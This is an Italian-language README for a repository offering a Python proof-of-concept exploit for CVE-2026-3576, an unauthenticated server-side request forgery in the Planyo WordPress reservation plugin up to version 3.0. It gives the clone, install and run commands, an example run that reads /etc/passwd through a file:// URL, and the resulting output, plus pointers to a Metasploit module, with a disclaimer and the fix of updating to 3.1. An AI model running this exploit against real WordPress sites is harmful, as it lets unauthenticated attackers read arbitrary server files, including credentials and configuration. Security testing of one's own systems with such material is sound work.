
Exploit Proof of Concept per CVE-2026-3576
Questo repository contiene una Proof of Concept (PoC) basata su Python per l'exploit di CVE-2026-3576. È disponibile anche su Exploit-DB qui.
Ho inoltre sviluppato un modulo Metasploit per questo exploit, disponibile qui.
Questo progetto è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. Non utilizzarlo contro sistemi di cui non sei proprietario o per i quali non hai il permesso di effettuare test.
Esiste una vulnerabilità di Server Side Request Forgery (SSRF) nel plugin Planyo Online Reservation System per Wordpress, nelle versioni precedenti alla 3.1. Essa consente a un attaccante non autenticato di fornire un URL file:// tramite il parametro ulap_url, permettendo l'accesso arbitrario ai file.
Un'analisi dettagliata con analisi del codice sorgente e dimostrazione dell'exploit è disponibile sul mio blog Medium.
| Componente | Versione |
|---|
| Plugin vulnerabile | <=3.0 |
| Plugin corretto | 3.1 |
git clone https://github.com/anirbala98/CVE-2026-3576.git
cd CVE-2026-3576/
pip install -r requirements.txt
python exploit.py <base_url> -f <posizione_file> --disable-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
[*] Verifica se il target è vulnerabile...
[+] Versione trovata: 2.9
[+] Il target è vulnerabile
[*] Tentativo di lettura di un file arbitrario...
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
Aggiornare il plugin alla versione 3.1.